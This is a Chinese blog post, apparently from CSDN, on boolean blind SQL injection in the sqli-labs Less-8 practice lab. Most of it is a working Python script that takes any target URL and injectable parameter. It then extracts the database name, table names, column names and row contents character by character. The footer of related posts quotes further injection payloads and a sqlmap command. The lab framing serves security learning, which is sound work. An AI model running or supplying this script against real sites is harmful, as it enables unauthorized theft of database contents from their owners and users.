sqli-labs-Less8关于布尔盲注

最新推荐文章于 2024-02-24 20:58:57 发布
最新推荐文章于 2024-02-24 20:58:57 发布
阅读量348 收藏 1
点赞数 1
分类专栏: SQL注入 python脚本 文章标签: python sql mysql 安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rfrder/article/details/108759118
版权

这是一道布尔注入的题目,其实也可以时间盲注,但是这里介绍一下bool注入。
关于布尔注入,主要使用的就是:

Length()函数 返回字符串的长度
Substr()截取字符串
Ascii()返回字符的ascii码
sleep(n):将程序挂起一段时间 n为n秒
if(expr1,expr2,expr3):判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句

具体的过程这里就不介绍了,因为非常容易上手,就是有点费手,所以最好不要手注。因此可以使用burp suite来进行注入或者sqlmap来直接爆(sqlmap,永远滴神)。但是最好还是学会自己写轮子,每学一种就写轮子,这样慢慢积累,等同于自己写了个sqlmap。

这里我写了个布尔注入的脚本,非常简陋而且并没有用二分法(别问,问就是二分法没学好。。。)。以后会改成二分法来提高效率。

import requests
def database_len(url,param1,param2,cont):
    #url='''http://www.sqli.com/Less-8/'''
    for i in range(1,10):
        payload=''' and length(database())=%d     -- -'''%i
        r=requests.get(url+param1+payload)
        if cont in r.text:
            print('database_length:',i)
            return i


def database_name(url,param1,param2,cont,db_len):
    database_name=''
    #url='''http://www.sqli.com/Less-8/'''
    for i in range(1,db_len+1):
        for j in 'abcdefghijklmnopqrstuvwxyz':
            payload=''' and substr(database(),%d,1)='%s'  -- -'''%(i,j)
            r=requests.get(url+param1+payload)
            if cont in r.text:
                database_name+=j
                break
    print('database_name:',database_name)
    return database_name


def table_number(url,param1,param2,cont,db_name):
    #url='''http://www.sqli.com/Less-8/'''
    i=0
    while 1:
        payload=''' union select 1,2,table_name from information_schema.tables where table_schema='%s'  limit %d,1 -- -'''%(db_name,i)
        r=requests.get(url+param2+payload)
        if cont in r.text:
            i=i+1
        else:
            break
    print('table_number:',i)
    return i

def table_len(url,param1,param2,cont,i,db_name):
    #url='''http://www.sqli.com/Less-8/'''
    for length in range(1,10):
        payload=''' and length((select table_name from information_schema.tables where table_schema='%s'  limit %d,1))=%d -- -'''%(db_name,i,length)
        r=requests.get(url+param1+payload)
        if cont in r.text:
            return length




def table_name(url,param1,param2,cont,table_number,db_name):
    #url='''http://www.sqli.com/Less-8/'''
    table_names=[]
    for i in range(0,table_number):
        length=table_len(url,param1,param2,cont,i,db_name)
        table_name=''
        for j in range(0,length+1):
            for k in 'abcdefghijklmnopqrstuvwxyz':
                payload=''' and substr((select table_name from information_schema.tables where table_schema='%s'  limit %d,1),%d,1)='%s' -- -'''%(db_name,i,j,k)
                r=requests.get(url+param1+payload)
                if cont in r.text:
                    table_name+=k
                    break

        table_names.append(table_name)
    return table_names


def column_number(url,param1,param2,cont,table_name):
    #url='''http://www.sqli.com/Less-8/'''
    i=0
    while 1:
        payload=''' union select 1,2,column_name from information_schema.columns where table_name='%s'  limit %d,1 -- -'''%(table_name,i)
        r=requests.get(url+param2+payload)
        if cont in r.text:
            i=i+1
        else:
            break
    print('%s表中列的数量:'%table_name,i)
    return i


def column_len(url,param1,param2,cont,j,table_name):
    #url='''http://www.sqli.com/Less-8/'''
    for length in range(1,25):
        payload=''' and length((select column_name from information_schema.columns where table_name='%s'  limit %d,1))=%d -- -'''%(table_name,j,length)
        r=requests.get(url+param1+payload)
        if cont in r.text:
            return length
def column_name(url,param1,param2,cont,table_names):
    #url='''http://www.sqli.com/Less-8/'''
    #column_names=[]
    for table_name in table_names:
        column_num=column_number(url,param1,param2,cont,table_name)
        for j in range(0,column_num):
            column_name=''
            length=column_len(url,param1,param2,cont,j,table_name)
            #print('%s的第%d个列的长度为:%d'%(table_name,j+1,length))
            for v in range(1,length+1):
                for k in 'abcdefghijklmnopqrstuvwxyz':
                    payload=''' and substr((select column_name from information_schema.columns where table_name='%s'  limit %d,1),%d,1)='%s' -- -'''%(table_name,j,v,k)
                    r=requests.get(url+param1+payload)
                    if cont in r.text:
                        column_name+=k
                        break
            print('%s的第%d个列的名字是:%s'%(table_name,j+1,column_name))
        print()

def content_number(url,param1,param2,cont,table_n,column_n):
    #url='''http://www.sqli.com/Less-8/'''
    i=0
    while 1:
        payload=''' union select 1,2,%s  from %s   limit %d,1 -- -'''%(column_n,table_n,i)
        r=requests.get(url+param2+payload)
        if cont in r.text:
            i=i+1
        else:
            break
    return i

def content_len(url,param1,param2,cont,table_n,column_n,i):
    #url='''http://www.sqli.com/Less-8/'''
    for length in range(1,25):
        payload=''' and length((select %s from %s   limit %d,1))=%d -- -'''%(column_n,table_n,i,length)
        r=requests.get(url+param1+payload)
        if cont in r.text:
            return length

def content(url,param1,param2,cont,table_n,column_n):
    #url='''http://www.sqli.com/Less-8/'''
    number=content_number(url,param1,param2,cont,table_n,column_n)
    for i in range(0,number):
        content=''
        length=content_len(url,param1,param2,cont,table_n,column_n,i)
        for j in range(1,length+1):
            for k in 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789':
                payload=''' and substr((select %s from %s   limit %d,1),%d,1)='%s' -- -'''%(column_n,table_n,i,j,k)
                r=requests.get(url+param1+payload)
                if cont in r.text:
                        content+=k
                        break
        print(content)

        


url=input("请输入要注入的网址,例如http://www.sqli.com/Less-8/    :")
param1=input("请输入要注入的已经闭合了的参数且可回显的,例如 ?id=1'   :")
param2=input("请输入要注入的已经闭合了的参数且不可回显的,例如 ?id=0'   :")
cont=input("请输入布尔回显:")
db_len=database_len(url,param1,param2,cont)
print()
db_name=database_name(url,param1,param2,cont,db_len)
print()
table_number=table_number(url,param1,param2,cont,db_name)
print()
table_names=table_name(url,param1,param2,cont,table_number,db_name)
print('%s的表如下:'%db_name)
for i in table_names:
    print(i)
print()
column_name(url,param1,param2,cont,table_names)
print()


#读取列的内容
while 1:
    table_n=input('请输入您要读取的表名,如果输入I want to leave,那么程序就会退出:')
    if table_n=='I want to leave' :
        break
    column_n=input('请输入您要读取的列名,如果输入I want to leave,那么程序就会退出:')
    if column_n=='I want to leave':
        break
    print()
    content(url,param1,param2,cont,table_n,column_n)
    print()

因为刚学了相当于2天的python,所以也是写的惨不忍睹。。。(大师傅们轻点喷)。

bfengj
关注
专栏目录
sqlserver数据库布尔盲注_Sqli labs系列-less-8 基于布尔盲注来注入
weixin_34959044的博客
01-16 117
第八关,还是上一关一样,我们无法得出数据的,不过如果用盲注的手段,我还是可以猜测出数据的。盲注具体是啥意思,我就不说了,玩这个都直达,常见的盲注,一个基于布尔值的盲注,一个是基于时间上的盲注。这里我们用到的是基于布尔盲注,当然,这章,我们只是利用这一关,让大家更深入的理解的什么是基于布尔值的盲注。在我自己的学习中,我是很讨厌看文字的,同时如果看图的话,还能看的进心里,同时也好理解,但是很多人的图...
sqli-labs Less-8(布尔盲注
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-11 576
布尔盲注其实就是构造一个SQL语句,当语句成立时,页面会返回特点的标识,语句不成立是返回其他,或无数据。因此我们可以构造一个判断语句,利用页面的返回结果来得知判断语句是否正确。 再学习布尔盲注之前,一些常用函数如下: length(): 返回字符串长度。 substr(str, start, len): 截取str,从start开始,截取长度为len。 ascii(): 返回字符串的ascii码。 1、判断共有几个数据库 payload ?id=1' and (select count(schema_na
Less-8(盲注--布尔盲注
老司机开代码的博客
08-03 1257
文章目录布尔盲注1. 关卡分析2. 盲注思路3. 编写工具进行通关 布尔盲注 在前面的练习中,也涉及到了布尔盲注的解题过程,思路都是一样的。自己构造判断语句强制页面进行判断并根据返回结果查看判断的正确性。 1. 关卡分析 本次的关卡是less-8,首先我们来分析一下这个页面。通过多次的尝试我们发现,如果输入的是true,那么就会返回一个You are in......,而如果是false,则不会返...
SQLi LABS Less-8 布尔盲注
热门推荐
wangyuxiang946的博客
02-17 1万+
SQLi 第八关,sqli-labs less8,sqlilabs less 8
sqlilabs(SQL注入)小白通基础通关笔记(专针对小白)(第八关Less-8)
u013630181的博客
07-06 242
第8关与第5关类似直接加’就可以了 $sql="SELECT * FROM users WHERE id='$id'(直接加不解释) LIMIT 0,1"; so这里不是重点,上节课讲了burpsuite跑数值包,那这节课重点讲burpsuite结合sqlmap进行跑包。重点是sqlmap跑。着了就不讲sqlmap搭建和教程了,我们直接操作。 ...
SQLI—labs-master(报错型、布尔型、盲注sql注入)
Hala
04-12 636
第五、六关 说明:此关为报错型sql注入,意思是,输入信息只有报的错误信息,即不是像前几关一样,直接显示出来想要的数据 注入思路: 没有正常的输出位,需要的数据通过报错进行输出显示 步骤: 前几步与前几关的思路相同,即先判断出来闭合符,输出列数(order by二分法),然后就要用分组的group by语句将不确定的分组进行打印,那么打印的肯定是错误的,即利用打印出来的错误...
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
最新发布
m0_73615178的博客
02-24 1413
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1853
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
sqli-labs Less-5(布尔盲注
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
01-31 637
前几篇sql注入文章 sqli-labs Less-1(联合注入、字符型注入) sqli-labs Less-2(联合注入、整形型注入) sqli-labs Less-3(联合注入、字符型注入) sqli-labs Less-4(联合注入、字符型注入) sqli-labs Less-5(利用extractvalue进行报错注入) sqli-labs Less-5(双注入) 布尔盲注其实就是构造一个SQL语句,当语句成立时,页面会返回特点的标识,语句不成立是返回其他,或无数据。因此我们可以构造一个判断语句,利
sqli-labs第八关(布尔盲注
qq_42266432的博客
08-19 1448
第八关看标题可知此关可以使用布尔盲注布尔盲注我的理解是页面不会回显错误,但是注入等式或不等式时通过页面的反应能判断出注入中算式的true或false 布尔盲注的步骤如下: 获取数据库长度 获取数据库名 获取数据库表 获取表中字段 获取表中数据 先拿获取数据库长度举例 可以看到在length(database())>7时页面正常,length(database())>8时页面异常,即8>7=true,8>8=false,所以数据库名长度为8 再比如获取表名: 同理,sub
sqli-labs lesson8 python 脚本源代码(修复小bug后的版本)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈
sqli-labs-less-8 布尔盲注+延时注入(详解)
yzcn
10-30 820
Less-8 延时注入+布尔盲注 判断注入点: http://127.0.0.1/sqli-labs-master/Less-8/?id=1 显示正常 http://127.0.0.1/sqli-labs-master/Less-8/?id=1’ 无任何回显 http://127.0.0.1/sqli-labs-master/Less-8/?id=1’ --+ 显示正常,找到注入点,该题特点为正确时返回you are in,错误时无任何回显,可以考虑用之前的布尔盲注或者延时注入进行解题 方法一(布尔
SQLi-Labs刷题记录】第八关思路 布尔盲注
gavinmao97的博客
12-16 1082
/* 作者刚刚接触sql注入,本文仅用作记录刷sqli-labs靶场时的思路,仅代表个人看法,如有不当之处,欢迎各位大佬及时批评指正! */ 根据关卡名称可知,sqli-labs第八关的考点是布尔盲注SQLi-Labs Less-8 第一步,根据关卡名称提示可知,本题的注入点需要构造一个闭合的单引号对 构建url: …/Less-8/?id=8’ 页面无显示 构建url: …/Less-8/?id=8’ --+ 页面显示正常 根据页面回显可知,本关的反馈结果只有“You are in”或者没有反馈,而
sql-libs——less8
bronze_s的博客
10-25 265
http://192.168.31.164:9002/Less-8/?id=1' 加'不再显示“you are in” http://192.168.31.164:9002/Less-8/?id=1'--+ 加'--+显示正常 http://192.168.31.164:9002/Less-8/?id=1' and sleep(5)--+ 加入and sleep(5)发现延迟5s说明存在SQL注入漏洞 http://192.168.31.164:9002/Less-8/?id=1' and if
【超详解】sql盲注中的布尔类型(Less-8)、时间类型的盲注(Less-9)
lyy0xfff的博客
07-07 923
SQL注入之盲注基于布尔类型的盲注(Less-8)基于时间类型的盲注 基于布尔类型的盲注(Less-8) 首先布尔类型只有两种状态:Ture和False 盲注的意思就是我们在网页端并不能看到它的回显,只能根据逻辑来进行判断语句是否执行成功 会用到的SQL函数: length()用来获取字符串的长度 ASCII()用来获取字符串的ASCII码 substr(str,M,N)用来截取字符串 其中str为要截取的字符串、M为从第几个字符开始截取N为截多少个字符,例如substr(str,1,1)的意思就是从str
Sqli-Labs学习记录(手工注入)(Less1-Less8)
Hello world and you!
01-29 389
冥泽的sqli-labs笔记(手工注入)Less 1Less 2Less 3Less 4Less 5Less 6Less 7Less 8 Less 1 尝试 ?id=1’ 看报错内容 判断输入参数的内容被存放到一对单引号中间 利用order看字段数 到 http://localhost/sqlilabs/Less-1/?id=-1’ order by 4 --+ 报错 证明字段数为3 判断回显位 http://localhost/sqlilabs/Less-1/?id=-1’ union sele
网络安全-sqlmap实战之sqlilabs-Less8
关注网络安全、云原生安全
06-29 1284
目录 类型 -dbs枚举数据库 --tables枚举数据库表 --columns枚举列 --dump枚举数据 查看源代码 类型 布尔盲注-单引号 猜测出sql语句 SELECT * FROM users where id = '参数' LIMIT 0,1 -dbs枚举数据库 使用-o参数优化,--batch参数进行跳过 python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-8/?id=1" -o -dbs --
Blind SQL Injection
Nixawk
04-23 1379
https://www.owasp.org/index.php/Blind_SQL_Injection
less1-less8
qq_36567469的博客
03-15 462
less1(备注:--+可以用#替代,因为是在url中,所以#要用url模式%23) less2 less03
sqli-labs-less-8
09-27
sqli-labs-less-8是一个用于学习SQL注入的实验题目。在这个实验中,通过在GET请求中使用闭合单引号和布尔值来进行盲注攻击。具体的步骤如下: 1. 在URL中输入id参数,并在参数值后添加闭合单引号,例如?id=1' 2. 利用布尔值来判断数据库的名称长度。通过添加注释符号"--"和#来绕过后续的查询条件,例如and length(database())=8 -- # 3. 通过不断尝试不同的长度值,直到找到正确的数据库名称长度。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值